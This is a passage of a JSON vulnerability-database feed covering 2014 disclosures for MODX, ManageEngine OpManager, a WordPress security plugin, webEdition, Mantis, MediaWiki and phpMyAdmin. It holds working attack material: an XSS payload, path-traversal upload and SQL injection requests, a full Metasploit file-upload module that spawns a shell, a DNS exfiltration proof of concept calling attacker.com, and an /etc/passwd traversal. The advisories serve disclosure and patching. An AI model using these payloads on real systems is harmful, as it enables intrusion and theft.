"AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/22694"}, {"lastseen": "2018-03-20T11:17:25", "references": [], "edition": 2, "description": "MODX Revolution version 2.3.1-pl suffers from a reflective cross site scripting vulnerability.", "reporter": "High-Tech Bridge", "published": "2014-09-18T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "type": "zdt", "title": "MODX Revolution 2.3.1-pl Cross Site Scripting Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-5451"], "modified": "2014-09-18T00:00:00", "id": "1337DAY-ID-22656", "href": "https://0day.today/exploit/description/22656", "sourceData": "Vendor: MODX\r\nVulnerable Version(s): 2.3.1-pl and probably prior\r\nTested Version: 2.3.1-pl\r\nAdvisory Publication: August 20, 2014 [without technical details]\r\nVendor Notification: August 20, 2014 \r\nVendor Patch: September 11, 2014 \r\nPublic Disclosure: September 17, 2014 \r\nVulnerability Type: Cross-Site Scripting [CWE-79]\r\nCVE Reference: CVE-2014-5451\r\nRisk Level: Low \r\nCVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)\r\nSolution Status: Fixed by Vendor\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered vulnerability in MODX Revolution, which can be exploited to perform Cross-Site Scripting (XSS) attacks.\r\n\r\n\r\n1) Reflected Cross-Site Scripting (XSS) in MODX Revolution: CVE-2014-5451\r\n\r\nThe vulnerability exists due to insufficient sanitization of input data passed via the \"a\" HTTP GET parameter to \"/manager/\" URL. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.\r\nThis vulnerability can be used against website administrator to perform phishing attacks, steal potentially sensitive data and gain complete control over web application.\r\n\r\nThe exploitation example below uses the \"alert()\" JavaScript function to display \"immuniweb\" word:\r\n\r\nhttp://[host]/manager/?a=%22%20onload=%22javascript:alert%28/immuniweb/%29;%22%3E\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nUpdate \"manager/templates/default/header.tpl\" file from GitHub.\r\n\r\nMore Information:\r\nhttps://github.com/modxcms/revolution/issues/11966\r\nhttps://github.com/modxcms/revolution/commit/e36f80f18e9514204bf2ce82747c8adf7e47a9c9\n\n# 0day.today [2018-03-20] #", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://0day.today/exploit/22656"}], "exploitdb": [{"lastseen": "2018-01-25T18:52:52", "osvdbidlist": [], "references": [], "description": "ManageEngine OpManager / Social IT Plus / IT360 - Multiple Vulnerabilities. CVE-2014-6034,CVE-2014-6035,CVE-2014-6036,CVE-2014-7866,CVE-2014-7868. Webapps ex...", "edition": 1, "reporter": "Exploit-DB", "published": "2014-11-09T00:00:00", "type": "exploitdb", "title": "ManageEngine OpManager / Social IT Plus / IT360 - Multiple Vulnerabilities", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2014-6035", "CVE-2014-6034", "CVE-2014-7866", "CVE-2014-7868", "CVE-2014-6036"], "modified": "2014-11-09T00:00:00", "href": "https://www.exploit-db.com/exploits/43896/", "id": "EDB-ID:43896", "sourceData": ">> Multiple vulnerabilities in ManageEngine OpManager, Social IT Plus and IT360\r\n>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security\r\n==========================================================================\r\nDisclosure: 27/09/2014 (#1 and #2), 09/11/2014 (#3 and #4) / Last updated: 09/11/2014\r\n\r\n>> Background on the affected products:\r\n\"ManageEngine OpManager is a network and data center infrastructure management software that helps large enterprises, service providers and SMEs manage their data centers and IT infrastructure efficiently and cost effectively. Automated workflows, intelligent alerting engines, configurable discovery rules, and extendable templates enable IT teams to setup a 24x7 monitoring system within hours of installation.\"\r\n\r\n\"Social IT Plus offers a cascading wall that helps IT folks to start discussions, share articles and videos easily and quickly. Other team members can access it and post comments and likes on the fly.\"\r\n\r\n\"Managing mission critical business applications is now made easy through ManageEngine IT360. With agentless monitoring methodology, monitor your applications, servers and databases with ease. Agentless monitoring of your business applications enables you high ROI and low TOC. With integrated network monitoring and bandwidth utilization, quickly troubleshoot any performance related issue with your network and assign issues automatically with ITIL based ServiceDesk integration.\"\r\n\r\n\r\n>> Technical details:\r\n#1\r\nVulnerability: Remote code execution via WAR file upload\r\nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360\r\n\r\na)\r\nCVE-2014-6034\r\nPOST /servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector?regionID=../../../tomcat/webapps&FILENAME=payload.war\r\n<... WAR file payload ...>\r\nAffected versions: OpManager v8.8 to v11.4; Social IT Plus v11.0; IT360 v? to v10.4\r\nA Metasploit module that exploits this vulnerability has been released.\r\n\r\nb)\r\nCVE-2014-6035\r\nPOST /servlets/FileCollector?AGENTKEY=123&FILENAME=../../../tomcat/webapps/warfile.war\r\n<... WAR file payload ...>\r\n\r\nAffected versions: OpManager v? to v11.4\r\n\r\n\r\n#2\r\nVulnerability: Arbitrary file deletion\r\nCVE-2014-6036\r\nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360\r\nAffected versions: OpManager v? to v11.4; Social IT Plus v11.0; IT360 v? to v10.3/10.4\r\n\r\nPOST /servlets/multipartRequest?customIcon=delete&fileName=../../../../boot.ini\r\n\r\n\r\n#3\r\nVulnerability: Remote code execution via file upload\r\nCVE-2014-7866\r\nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360\r\n\r\na)\r\nPOST /servlet/MigrateLEEData?fileName=../tomcat/webapps/warfile.war%00\r\n<... WAR file payload ...>\r\n\r\nAffected versions: Unknown, at least OpManager v8 build 88XX to 11.4; IT360 10.3/10.4; Social IT 11.0\r\n\r\nb)\r\nPOST /servlet/MigrateCentralData?operation=downloadFileFromProbe&zipFileName=../tomcat/webapps/warfile.war%00\r\n<... WAR file payload ...>\r\n\r\nAffected versions: Unknown, at least OpManager v8 build 88XX to 11.4; IT360 10.3/10.4; Social IT 11.0\r\n\r\n\r\n#4\r\nVulnerability: Blind SQL injection\r\nCVE-2014-7868\r\nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360\r\n\r\na)\r\nPOST /servlet/APMBVHandler?OPERATION_TYPE=Delete&OPM_BVNAME=[SQLi]\r\nPOST /servlet/APMBVHandler?OPERATION_TYPE=Delete&OPM_BVNAME=aaa'%3bcreate+table+pulicia+(bolas+text)%3b--+\r\nAffected versions: Unknown, at least the current versions (OpManager 11.3/11.4; IT360 10.3/10.4; Social IT 11.0)\r\n\r\nb)\r\nPOST /servlet/DataComparisonServlet?operation=compare&numPrimaryKey=1337&query=[SQLi] --> runs direct query in db!\r\nPOST /servlet/DataComparisonServlet?operation=compare&numPrimaryKey=1337&query=create+table+panicia+(bolos+text)\r\nAffected versions: Unknown, at least the current versions (OpManager 11.3/11.4; IT360 10.3/10.4; Social IT 11.0)\r\n\r\n\r\n>> Fix:\r\nUpgrade to OpManager 11.3 or 11.4, then install patches [A], [B] and [C].\r\nThis patch can be applied to all the applications but only for the latest version of each (OpManager 11.3/11.4, Social IT 11.0, IT360 10.4).\r\nThe fix will be included in OpManager version 11.5 which should be released sometime in late November or December 2014. No indication was given for when fixed versions of IT360 and Social IT Plus will be released.\r\n\r\n[A] https://support.zoho.com/portal/manageengine/helpcenter/articles/servlet-vulnerability-fix\r\nResolves #1 and #2\r\n\r\n[B] https://support.zoho.com/portal/manageengine/helpcenter/articles/sql-injection-vulnerability-fix\r\nResolves #3\r\n\r\n[C] https://support.zoho.com/portal/manageengine/helpcenter/articles/fix-for-remote-code-execution-via-file-upload-vulnerability\r\nResolves #4\r\n\r\n================\r\nAgile Information Security Limited\r\nhttp://www.agileinfosec.co.uk/\r\n>> Enabling secure digital business >>", "sourceHref": "https://www.exploit-db.com/download/43896/", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-02-04T00:06:17", "osvdbidlist": ["112276"], "references": [], "description": "ManageEngine OpManager / Social IT Arbitrary File Upload. CVE-2014-6034. Remote exploit for java platform", "edition": 1, "reporter": "Pedro Ribeiro", "published": "2014-10-02T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "type": "exploitdb", "title": "ManageEngine OpManager / Social IT Arbitrary File Upload", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-6034"], "modified": "2014-10-02T00:00:00", "id": "EDB-ID:34867", "href": "https://www.exploit-db.com/exploits/34867/", "sourceData": "##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'ManageEngine OpManager / Social IT Arbitrary File Upload',\r\n 'Description' => %q{\r\n This module exploits a file upload vulnerability in ManageEngine OpManager and Social IT.\r\n The vulnerability exists in the FileCollector servlet which accepts unauthenticated\r\n file uploads. This module has been tested successfully on OpManager v8.8 - v11.3 and on\r\n version 11.0 of SocialIT for Windows and Linux.\r\n },\r\n 'Author' =>\r\n [\r\n 'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability Discovery and Metasploit module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'CVE', '2014-6034' ],\r\n [ 'OSVDB', '112276' ],\r\n [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_opmanager_socialit_it360.txt' ],\r\n [ 'URL', 'http://seclists.org/fulldisclosure/2014/Sep/110' ]\r\n ],\r\n 'Privileged' => true,\r\n 'Platform' => 'java',\r\n 'Arch' => ARCH_JAVA,\r\n 'Targets' =>\r\n [\r\n [ 'OpManager v8.8 - v11.3 / Social IT Plus 11.0 Java Universal', { } ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Sep 27 2014'))\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(80),\r\n OptInt.new('SLEEP',\r\n [true, 'Seconds to sleep while we wait for WAR deployment', 15]),\r\n ], self.class)\r\n end\r\n\r\n def check\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(\"/servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector\"),\r\n 'method' => 'GET'\r\n })\r\n\r\n # A GET request on this servlet returns \"405 Method not allowed\"\r\n if res and res.code == 405\r\n return Exploit::CheckCode::Detected\r\n end\r\n\r\n return Exploit::CheckCode::Safe\r\n end\r\n\r\n\r\n def upload_war_and_exec(try_again, app_base)\r\n tomcat_path = '../../../tomcat/'\r\n servlet_path = '/servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector'\r\n\r\n if try_again\r\n # We failed to obtain a shell. Either the target is not vulnerable or the Tomcat configuration\r\n # does not allow us to deploy WARs. Fix that by uploading a new context.xml file.\r\n # The file we are uploading has the same content apart from privileged=\"false\" and lots of XML comments.\r\n # After replacing the context.xml file let's upload the WAR again.\r\n print_status(\"#{peer} - Replacing Tomcat context file\")\r\n send_request_cgi({\r\n 'uri' => normalize_uri(servlet_path),\r\n 'method' => 'POST',\r\n 'data' => %q{<?xml version='1.0' encoding='utf-8'?><Context privileged=\"true\"><WatchedResource>WEB-INF/web.xml</WatchedResource></Context>},\r\n 'ctype' => 'application/xml',\r\n 'vars_get' => {\r\n 'regionID' => tomcat_path + \"conf\",\r\n 'FILENAME' => \"context.xml\"\r\n }\r\n })\r\n else\r\n # We need to create the upload directories before our first attempt to upload the WAR.\r\n print_status(\"#{peer} - Creating upload directories\")\r\n bogus_file = rand_text_alphanumeric(4 + rand(32 - 4))\r\n send_request_cgi({\r\n 'uri' => normalize_uri(servlet_path),\r\n 'method' => 'POST',\r\n 'data' => rand_text_alphanumeric(4 + rand(32 - 4)),\r\n 'ctype' => 'application/xml',\r\n 'vars_get' => {\r\n 'regionID' => \"\",\r\n 'FILENAME' => bogus_file\r\n }\r\n })\r\n register_files_for_cleanup(\"state/archivedata/zip/\" + bogus_file)\r\n end\r\n\r\n war_payload = payload.encoded_war({ :app_name => app_base }).to_s\r\n\r\n print_status(\"#{peer} - Uploading WAR file...\")\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(servlet_path),\r\n 'method' => 'POST',\r\n 'data' => war_payload,\r\n 'ctype' => 'application/octet-stream',\r\n 'vars_get' => {\r\n 'regionID' => tomcat_path + \"webapps\",\r\n 'FILENAME' => app_base + \".war\"\r\n }\r\n })\r\n\r\n # The server either returns a 500 error or a 200 OK when the upload is successful.\r\n if res and (res.code == 500 or res.code == 200)\r\n print_status(\"#{peer} - Upload appears to have been successful, waiting \" + datastore['SLEEP'].to_s +\r\n \" seconds for deployment\")\r\n sleep(datastore['SLEEP'])\r\n else\r\n fail_with(Exploit::Failure::Unknown, \"#{peer} - WAR upload failed\")\r\n end\r\n\r\n print_status(\"#{peer} - Executing payload, wait for session...\")\r\n send_request_cgi({\r\n 'uri' => normalize_uri(app_base, Rex::Text.rand_text_alpha(rand(8)+8)),\r\n 'method' => 'GET'\r\n })\r\n end\r\n\r\n\r\n def exploit\r\n app_base = rand_text_alphanumeric(4 + rand(32 - 4))\r\n\r\n upload_war_and_exec(false, app_base)\r\n register_files_for_cleanup(\"tomcat/webapps/\" + \"#{app_base}.war\")\r\n\r\n sleep_counter = 0\r\n while not session_created?\r\n if sleep_counter == datastore['SLEEP']\r\n print_error(\"#{peer} - Failed to get a shell, let's try one more time\")\r\n upload_war_and_exec(true, app_base)\r\n return\r\n end\r\n\r\n sleep(1)\r\n sleep_counter += 1\r\n end\r\n end\r\nend", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/34867/"}, {"lastseen": "2016-02-03T23:55:34", "osvdbidlist": ["112082"], "references": [], "description": "Wordpress All In One WP Security Plugin 3.8.2 - SQL Injection. CVE-2014-6242. Webapps exploit for php platform", "edition": 1, "reporter": "High-Tech Bridge SA", "published": "2014-09-25T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "exploitdb", "title": "WordPress All In One WP Security Plugin 3.8.2 - SQL Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-6242"], "modified": "2014-09-25T00:00:00", "id": "EDB-ID:34781", "href": "https://www.exploit-db.com/exploits/34781/", "sourceData": "Advisory ID: HTB23231\r\nProduct: All In One WP Security WordPress plugin\r\nVendor: Tips and Tricks HQ, Peter, Ruhul, Ivy \r\nVulnerable Version(s): 3.8.2 and probably prior\r\nTested Version: 3.8.2\r\nAdvisory Publication: September 3, 2014 [without technical details]\r\nVendor Notification: September 3, 2014 \r\nVendor Patch: September 12, 2014 \r\nPublic Disclosure: September 24, 2014 \r\nVulnerability Type: SQL Injection [CWE-89]\r\nCVE Reference: CVE-2014-6242\r\nRisk Level: Medium \r\nCVSSv2 Base Score: 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)\r\nSolution Status: Fixed by Vendor\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered two SQL injection vulnerabilities in All In One WP Security WordPress plugin, which can be exploited to perform SQL Injection attacks. Both vulnerabilities require administrative privileges, however can be also exploited by non-authenticated attacker via CSRF vector. \r\n\r\n\r\n1) SQL Injection in All In One WP Security WordPress plugin: CVE-2014-6242\r\n\r\n1.1 The vulnerability exists due to insufficient sanitization of user-supplied input passed via the \"orderby\" HTTP GET parameters to \"/wp-admin/admin.php\" script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.\r\n\r\nThe PoC code below is based on DNS Exfiltration technique and may be used to demonstrate vulnerability in the \"orderby\" parameter if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) sub-domain of \".attacker.com\" (a domain name, DNS server of which is controlled by the attacker):\r\n\r\nhttp://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&orderby=%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29\r\n\r\nThis vulnerability could also be exploited by a remote non-authenticated attacker via CSRF vector, since the application is prone to Cross-Site Request Forgery (CSRF) attacks. In order to do so an attacker should trick a logged-in administrator to visit a web page with an CSRF exploit, e.g.:\r\n\r\nhttp://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&order=,%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29\r\n\r\n\r\n1.2 The vulnerability exists due to insufficient sanitization of user-supplied input passed via the \"order\" HTTP GET parameters to \"/wp-admin/admin.php\" script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.\r\n\r\nThe PoC code below is based on DNS Exfiltration technique and may be used to demonstrate vulnerability in the \"order\" parameter if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) sub-domain of \".attacker.com\" (a domain name, DNS server of which is controlled by the attacker):\r\n\r\nhttp://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&orderby=%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29\r\n\r\nThis vulnerability could also be exploited by a remote non-authenticated attacker via CSRF vector, since the application is prone to Cross-Site Request Forgery (CSRF) attacks. In order to do so an attacker should trick a logged-in administrator to visit a web page with CSRF exploit, e.g.:\r\n\r\n<img src=\"http://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&orderby=%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29\">\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nUpdate to All In One WP Security 3.8.3\r\n\r\nMore Information:\r\nhttps://wordpress.org/plugins/all-in-one-wp-security-and-firewall/changelog/\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nReferences:\r\n\r\n[1] High-Tech Bridge Advisory HTB23231 - https://www.htbridge.com/advisory/HTB23231 - Two SQL Injections in All In One WP Security WordPress plugin.\r\n[2] All In One WP Security WordPress plugin - http://www.tipsandtricks-hq.com/wordpress-security-and-firewall-plugin - All round best WordPress security plugin.\r\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures.\r\n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.\r\n[5] ImmuniWeb\u00ae SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/34781/"}, {"lastseen": "2016-02-03T23:53:18", "osvdbidlist": ["109872"], "references": [], "description": "webEdition 6.3.8.0 (SVN-Revision: 6985) - Path Traversal. CVE-2014-5258. Webapps exploit for php platform", "edition": 1, "reporter": "High-Tech Bridge SA", "published": "2014-09-24T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "exploitdb", "title": "webEdition 6.3.8.0 SVN-Revision: 6985 - Path Traversal", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-5258"], "modified": "2014-09-24T00:00:00", "id": "EDB-ID:34761", "href": "https://www.exploit-db.com/exploits/34761/", "sourceData": "Advisory ID: HTB23227\r\nProduct: webEdition\r\nVendor: webEdition e.V.\r\nVulnerable Version(s): 6.3.8.0 (SVN-Revision: 6985) and probably prior\r\nTested Version: 6.3.8.0 (SVN-Revision: 6985) \r\nAdvisory Publication: August 6, 2014 [without technical details]\r\nVendor Notification: August 6, 2014 \r\nVendor Patch: September 4, 2014 \r\nPublic Disclosure: September 17, 2014 \r\nVulnerability Type: Path Traversal [CWE-22]\r\nCVE Reference: CVE-2014-5258\r\nRisk Level: Medium \r\nCVSSv2 Base Score: 4 (AV:N/AC:L/Au:S/C:P/I:N/A:N)\r\nSolution Status: Fixed by Vendor\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered vulnerability in webEdition, which can be exploited to read arbitrary files on the target system.\r\n\r\n\r\n1) Path Traversal in webEdition: CVE-2014-5258\r\n\r\nThe vulnerability exists due to insufficient sanitization of the \"file\" HTTP GET parameter in \"/webEdition/showTempFile.php\" script. A remote authenticated user can send a specially crafted HTTP GET request containing directory traversal sequences (e.g. \"../\") and read contents of arbitrary files on the target system with privileges of the web server.\r\n\r\nThe exploitation example below display contents of \"/etc/passwd\" file:\r\n\r\nhttp://[host]/webEdition/showTempFile.php?file=../../../../etc/passwd\r\n\r\nSuccessful exploitation of the vulnerability requires valid user credentials. Registration is not open by default and all user accounts are created by the administrator of the web application. \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nUpdate to webEdition 6.3.9 Beta\r\n\r\nMore Information:\r\nhttp://www.webedition.org/de/aktuelles/webedition-cms/webEdition-6.3.9-Beta-erschienen\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nReferences:\r\n\r\n[1] High-Tech Bridge Advisory HTB23227 - https://www.htbridge.com/advisory/HTB23227 - Path Traversal in webEdition.\r\n[2] webEdition - http://www.webedition.org - is a Content Management System.\r\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00c2\u017d is a dictionary of publicly known information security vulnerabilities and exposures.\r\n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.\r\n[5] ImmuniWeb\u00c2\u017d SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/34761/"}], "debian": [{"lastseen": "2016-09-02T18:25:39", "references": [], "affectedPackage": [{"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "1.2.11-1.2+deb7u1", "packageFilename": "mantis_1.2.11-1.2+deb7u1_all.deb", "packageName": "mantis", "arch": "all", "operator": "lt"}], "description": "Multiple SQL injection vulnerabilities have been discovered in the Mantis bug tracking system.\n\nFor the stable distribution (wheezy), these problems have been fixed in version 1.2.11-1.2+deb7u1.\n\nWe recommend that you upgrade your mantis packages.", "edition": 1, "reporter": "Debian", "published": "2014-09-20T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "mantis -- security update", "type": "debian", "bulletinFamily": "unix", "cvelist": ["CVE-2014-1608", "CVE-2014-1609"], "modified": "2014-09-20T00:00:00", "id": "DSA-3030", "href": "http://www.debian.org/security/dsa-3030", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-02T18:29:23", "references": [], "affectedPackage": [{"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "1:1.19.20+dfsg-0+deb7u1", "packageFilename": "mediawiki_1:1.19.20+dfsg-0+deb7u1_all.deb", "arch": "all", "packageName": "mediawiki", "operator": "lt"}], "edition": 1, "description": "It was reported that MediaWiki, a website engine for collaborative work, allowed to load user-created CSS on pages where user-created JavaScript is not allowed. A wiki user could be tricked into performing actions by manipulating the interface from CSS, or JavaScript code being executed from CSS, on security-wise sensitive pages like Special:Preferences and Special:UserLogin. This update removes the separation of CSS and JavaScript module allowance.\n\nFor the stable distribution (wheezy), this problem has been fixed in version 1:1.19.20+dfsg-0+deb7u1.\n\nFor the unstable distribution (sid), this problem has been fixed in version 1:1.19.20+dfsg-1.\n\nWe recommend that you upgrade your mediawiki packages.", "reporter": "Debian", "published": "2014-10-05T00:00:00", "type": "debian", "title": "mediawiki -- security update", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-7295"], "modified": "2014-10-05T00:00:00", "id": "DSA-3046", "href": "http://www.debian.org/security/dsa-3046", "cvss": {"score": 3.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:NONE/I:PARTIAL/A:NONE/"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:19", "references": ["http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6300", "https://bugs.gentoo.org/show_bug.cgi?id=517858", "https://bugs.gentoo.org/show_bug.cgi?id=530054", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4987", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-8960", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4986", "https://bugs.gentoo.org/show_bug.cgi?id=522844", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-8958", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-8959", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-8961"], "affectedPackage": [{"OS": "Gentoo", "OSVersion": "any", "packageVersion": "4.2.13", "packageName": "dev-db/phpmyadmin", "packageFilename": "UNKNOWN", "arch": "all", "operator": "lt"}], "description": "### Background\n\nphpMyAdmin is a web-based management tool for MySQL databases.\n\n### Description\n\nMultiple vulnerabilities have been discovered in phpMyAdmin. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote authenticated attacker could exploit these vulnerabilities to include and execute arbitrary local files via a crafted parameter, inject SQL code, or to conduct Cross-Site Scripting attacks. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll phpMyAdmin 4.2 users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-db/phpmyadmin-4.2.13\"\n \n\nAll phpMyAdmin 4.1 users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-db/phpmyadmin-4.1.14.7\"\n \n\nAll phpMyAdmin 4.0 users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-db/phpmyadmin-4.0.10.6\"", "edition": 1, "reporter": "Gentoo Foundation", "published": "2015-05-31T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "type": "gentoo", "title": "phpMyAdmin: Multiple vulnerabilities", "bulletinFamily": "unix", "cvelist": ["CVE-2014-6300", "CVE-2014-8958", "CVE-2014-8961", "CVE-2014-4986", "CVE-2014-8959", "CVE-2014-8960", "CVE-2014-4987"], "modified": "2016-05-14T00:00:00", "id": 